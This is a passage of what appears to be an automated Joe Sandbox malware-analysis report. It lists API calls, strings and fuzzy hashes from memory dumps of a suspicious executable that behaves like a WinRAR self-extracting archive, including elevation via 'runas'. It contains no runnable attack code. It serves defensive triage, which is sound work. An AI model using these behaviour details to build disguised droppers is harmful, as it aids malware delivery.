Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction ID: d84413e80e5756913269f7cad9577a1a533d6d1e024f83ab53545739f2fae08d
Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
Instruction Fuzzy Hash: A0218432A0CF8241FB609B25AC9013AA651EB85774F694335DAAF077D4EF39D885E311

Function 00007FF716144078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF716141D3E), ref: 00007FF7161440BC
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF716141D3E), ref: 00007FF716144102

Strings

csm, xrefs: 00007FF7161440EF

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction ID: 5a9d52a1ddb8b7d826f768c0cbdc5ee5ce594922ab5f2837db7c7bbb8e979b24
Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
Instruction Fuzzy Hash: 3B112B32619B8182EB609F15F84026AB7A5FB98BA4F584231DF8D07758EF3CD56AC700

Function 00007FF71612EA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF71612E95F,?,?,?,00007FF71612463A,?,?,?), ref: 00007FF71612EA63
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF71612E95F,?,?,?,00007FF71612463A,?,?,?), ref: 00007FF71612EA6E

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF71612EA78

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1211598281-2248577382
Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction ID: acaebfe836350885a4c284ddc690890cd86160fbf2c645094928bc2f9007e35d
Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
Instruction Fuzzy Hash: 90E01AA9E19D4281F640B735BC8247AA2217F66770FD00331D43E811F59F2CA94DE321

Function 00007FF71612A43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF71612A447
FindResourceW.KERNEL32 ref: 00007FF71612A45D

Strings

RTL, xrefs: 00007FF71612A453

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction ID: ff6da575a0aae6efd4fc4ddac0d23eed9951d5e0d3ce1ab4e013983c91b089ac
Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
Instruction Fuzzy Hash: 34D05E91F09A4286FF196B7ABC8933692715F1AF61FC94439CC1E06398EE2CD18CD761

Analysis Process: 572stuOQ0pZG2Xj.exePID: 6792, Parent PID: 6868COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	31

Executed Functions

Function 00007FF64D34B190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D32255C: GetDlgItem.USER32 ref: 00007FF64D3225AC
Part of subcall function 00007FF64D32255C: SetDlgItemTextW.USER32 ref: 00007FF64D3225C8

EndDialog.USER32 ref: 00007FF64D34B2D0
SetDlgItemTextW.USER32 ref: 00007FF64D34B320
GetMessageW.USER32 ref: 00007FF64D34B350
IsDialogMessageW.USER32 ref: 00007FF64D34B369
TranslateMessage.USER32 ref: 00007FF64D34B37B
DispatchMessageW.USER32 ref: 00007FF64D34B389
EndDialog.USER32 ref: 00007FF64D34B3D3
GetDlgItem.USER32 ref: 00007FF64D34B410
IsDlgButtonChecked.USER32 ref: 00007FF64D34B431
IsDlgButtonChecked.USER32 ref: 00007FF64D34B449
SetFocus.USER32 ref: 00007FF64D34B452
GetLastError.KERNEL32 ref: 00007FF64D34B634
GetLastError.KERNEL32 ref: 00007FF64D34B665
GetTickCount.KERNEL32 ref: 00007FF64D34B68B
GetLastError.KERNEL32 ref: 00007FF64D34B6F5
GetCommandLineW.KERNEL32 ref: 00007FF64D34B841
CreateFileMappingW.KERNEL32 ref: 00007FF64D34B900
MapViewOfFile.KERNEL32 ref: 00007FF64D34B923
Sleep.KERNEL32 ref: 00007FF64D34B9B6
UnmapViewOfFile.KERNEL32 ref: 00007FF64D34B9DF
CloseHandle.KERNEL32 ref: 00007FF64D34B9E8
SetDlgItemTextW.USER32 ref: 00007FF64D34BCDE
DialogBoxParamW.USER32 ref: 00007FF64D34C0D7
EndDialog.USER32 ref: 00007FF64D34C0EF
EnableWindow.USER32 ref: 00007FF64D34C2A6
IsDlgButtonChecked.USER32 ref: 00007FF64D34C2F8
ShellExecuteExW.SHELL32 ref: 00007FF64D34B95B

Part of subcall function 00007FF64D33AAE0: LoadStringW.USER32 ref: 00007FF64D33AB67
Part of subcall function 00007FF64D33AAE0: LoadStringW.USER32 ref: 00007FF64D33AB80

IsDlgButtonChecked.USER32 ref: 00007FF64D34BEC3
SendDlgItemMessageW.USER32 ref: 00007FF64D34BEEA
GetDlgItem.USER32 ref: 00007FF64D34BEF8
IsDlgButtonChecked.USER32 ref: 00007FF64D34BF12
GetDlgItem.USER32 ref: 00007FF64D34BF4F
SetDlgItemTextW.USER32 ref: 00007FF64D34BFEC
SetDlgItemTextW.USER32 ref: 00007FF64D34C004
SetDlgItemTextW.USER32 ref: 00007FF64D34C321
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34C363
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34C369
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34C36F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34C375
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34C37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34C381
SendDlgItemMessageW.USER32 ref: 00007FF64D34C449
EndDialog.USER32 ref: 00007FF64D34C463
GetDlgItem.USER32 ref: 00007FF64D34C491
SetFocus.USER32 ref: 00007FF64D34C49A
SendDlgItemMessageW.USER32 ref: 00007FF64D34C53E
FindFirstFileW.KERNEL32 ref: 00007FF64D34C562
FindClose.KERNEL32 ref: 00007FF64D34C68A
SendDlgItemMessageW.USER32 ref: 00007FF64D34C7AF

Part of subcall function 00007FF64D32129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D321396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34CAA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34CAAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34CAB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34CABB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34CAC1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34CAC7

Strings

REPLACEFILEDLG, xrefs: 00007FF64D34C3D3
-el -s2 "-d%s" "-sp%s", xrefs: 00007FF64D34B799
p, xrefs: 00007FF64D34B7AB
%s %s, xrefs: 00007FF64D34C6D9, 00007FF64D34C946
winrarsfxmappingfile.tmp, xrefs: 00007FF64D34B8E0
LICENSEDLG, xrefs: 00007FF64D34C0C9
runas, xrefs: 00007FF64D34B7C9
@, xrefs: 00007FF64D34B7B6
STARTDLG, xrefs: 00007FF64D34B1CA
__tmp_rar_sfx_access_check_, xrefs: 00007FF64D34B6A9

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
API String ID: 3303814210-2702805183
Opcode ID: 37539dee0de0f8605dc8fdad2644b0fa5e272ae0c210a86a0140fc28e7c4c48a
Instruction ID: 42afed13912e44efe8e537058b895f525c50a5ae2b935147729a91939920a335
Opcode Fuzzy Hash: 37539dee0de0f8605dc8fdad2644b0fa5e272ae0c210a86a0140fc28e7c4c48a
Instruction Fuzzy Hash: 3DD2A362E0D68291EA22FB25E8542F9E3A1EF87B84F404231D94DC76A5FF3DE544C740

Function 00007FF64D34CE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963fileCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF64D34D5F3
IsDlgButtonChecked.USER32 ref: 00007FF64D34D626
IsDlgButtonChecked.USER32 ref: 00007FF64D34D655
MoveFileW.KERNEL32 ref: 00007FF64D34DB4B
MoveFileExW.KERNEL32 ref: 00007FF64D34DB69
GetTempPathW.KERNEL32 ref: 00007FF64D34DC49

Part of subcall function 00007FF64D321FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D321FFB

EndDialog.USER32 ref: 00007FF64D34DFCA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D34EEE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EEEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF07
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF19
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF25
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF2B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF31
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF4F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D34EF5B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D34EF67
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D34EF73

Strings

@set:user, xrefs: 00007FF64D34DD96, 00007FF64D34DDA5
.tmp, xrefs: 00007FF64D34DA85
Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF64D34D501
lnk, xrefs: 00007FF64D34E3CA, 00007FF64D34E3D9
<br>, xrefs: 00007FF64D34D6DA, 00007FF64D34D6E9
HIDE, xrefs: 00007FF64D34E9E5, 00007FF64D34E9F4
ProgramFilesDir, xrefs: 00007FF64D34D4F0
MIN, xrefs: 00007FF64D34EAE5, 00007FF64D34EAF4
.lnk, xrefs: 00007FF64D34E406, 00007FF64D34E415
MAX, xrefs: 00007FF64D34EA82, 00007FF64D34EA91

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
API String ID: 1830998149-3916287355
Opcode ID: 2de75c9eefce9664ca3b6fbf1c6f62ef658c31bfe8ff5daa0510ddde276262ad
Instruction ID: c1e3260c99b611ede8402a924edc2e8a966f3ca79918a8ab566e5983e2668cd3
Opcode Fuzzy Hash: 2de75c9eefce9664ca3b6fbf1c6f62ef658c31bfe8ff5daa0510ddde276262ad
Instruction Fuzzy Hash: 5A13AE62E0CB8299EB12FF64D8802EC67B1EB46798F501535DA1D97AD9EF3CE584C340

Function 00007FF64D350754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF64D33DFD0: GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E018
Part of subcall function 00007FF64D33DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E030
Part of subcall function 00007FF64D33DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF64D33E05D

Part of subcall function 00007FF64D3362DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF64D3362F2
Part of subcall function 00007FF64D3362DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF64D33632C

Part of subcall function 00007FF64D34946C: OleInitialize.OLE32 ref: 00007FF64D349486
Part of subcall function 00007FF64D34946C: SHGetMalloc.SHELL32 ref: 00007FF64D3494D4

GetCommandLineW.KERNEL32 ref: 00007FF64D35096E
OpenFileMappingW.KERNEL32 ref: 00007FF64D350A07
MapViewOfFile.KERNEL32 ref: 00007FF64D350A30
UnmapViewOfFile.KERNEL32 ref: 00007FF64D350A46
MapViewOfFile.KERNEL32 ref: 00007FF64D350A63
UnmapViewOfFile.KERNEL32 ref: 00007FF64D350ACA
CloseHandle.KERNEL32 ref: 00007FF64D350AD3
SetEnvironmentVariableW.KERNEL32 ref: 00007FF64D350BAD
GetLocalTime.KERNEL32 ref: 00007FF64D350BB8
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF64D350C13
SetEnvironmentVariableW.KERNEL32 ref: 00007FF64D350C26
GetModuleHandleW.KERNEL32 ref: 00007FF64D350C2E
LoadIconW.USER32 ref: 00007FF64D350C4D
DialogBoxParamW.USER32 ref: 00007FF64D350CB6
Sleep.KERNEL32 ref: 00007FF64D350CE6
DeleteObject.GDI32 ref: 00007FF64D350D0D
DeleteObject.GDI32 ref: 00007FF64D350D1F
CloseHandle.KERNEL32 ref: 00007FF64D350D67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D350DD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D350DDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D350DE3

Part of subcall function 00007FF64D34FD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF64D34FD43
Part of subcall function 00007FF64D34FD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF64D34FDBC

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF64D350C02
sfxname, xrefs: 00007FF64D350B9B
winrarsfxmappingfile.tmp, xrefs: 00007FF64D3509F9
sfxstime, xrefs: 00007FF64D350C1F
STARTDLG, xrefs: 00007FF64D350CA5

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 1048086575-3710569615
Opcode ID: f9f8d21d412cc80ec5460a59123b82ae5e39a9285cdf70869c7ac79b4d5a8083
Instruction ID: ab2d4cfaf138dceadc1d53f3d318ea9827f2d36f4636e851872a370c7bcadd63
Opcode Fuzzy Hash: f9f8d21d412cc80ec5460a59123b82ae5e39a9285cdf70869c7ac79b4d5a8083
Instruction Fuzzy Hash: 3A127461E1DB8281EB12BF25E8552B9E3A1FF86784F404231E99DC6AA5FF3DE144C300

Function 00007FF64D33A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF64D33A504

Part of subcall function 00007FF64D340F68: WideCharToMultiByte.KERNEL32 ref: 00007FF64D340F99

SetDlgItemTextW.USER32 ref: 00007FF64D33A573
GetWindowRect.USER32 ref: 00007FF64D33A5AD
GetClientRect.USER32 ref: 00007FF64D33A5BB
GetWindowLongPtrW.USER32 ref: 00007FF64D33A66C
GetWindowRect.USER32 ref: 00007FF64D33A6B2
SetDlgItemTextW.USER32 ref: 00007FF64D33A6EC
GetSystemMetrics.USER32 ref: 00007FF64D33A6F7
GetWindow.USER32 ref: 00007FF64D33A708
GetWindowRect.USER32 ref: 00007FF64D33A746
GetWindow.USER32 ref: 00007FF64D33A808

Strings

CAPTION, xrefs: 00007FF64D33A6CF
$%s:, xrefs: 00007FF64D33A4EF

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 1936833115-404845831
Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction ID: 6ff3eb7e5accfe6ed95379d04a3090e3b61c7f201590f329f57b43cc5907ebe0
Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction Fuzzy Hash: 9191E332F1C64186E719BF29E80066AE7A1FB86784F505535EE4D97B98EF3DE805CB00

Function 00007FF64D32F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D331239
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33123F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D331245
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33124B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D331251
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D331257
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D33125D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D331263

Strings

__tmp_reference_source_, xrefs: 00007FF64D32FCCF, 00007FF64D32FCDE

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: __tmp_reference_source_
API String ID: 3668304517-685763994
Opcode ID: 9bcb2e275ed03a8d7aba150d2a16dff366c135dca2d4fe69d6366dd8b3466e57
Instruction ID: 61152ad2746de184e573091703de99cdc454af3c078c8ffecdd13581db36ceda
Opcode Fuzzy Hash: 9bcb2e275ed03a8d7aba150d2a16dff366c135dca2d4fe69d6366dd8b3466e57
Instruction Fuzzy Hash: BAE27362F0C6C252EA66FB25D1403EEE7A1FB82784F444132DA9D97AA5EF3CE455C700

Function 00007FF64D324840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32511E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D325124
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32512A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D325E16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D325E1C

Strings

CMT, xrefs: 00007FF64D3259B2

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: CMT
API String ID: 3668304517-2756464174
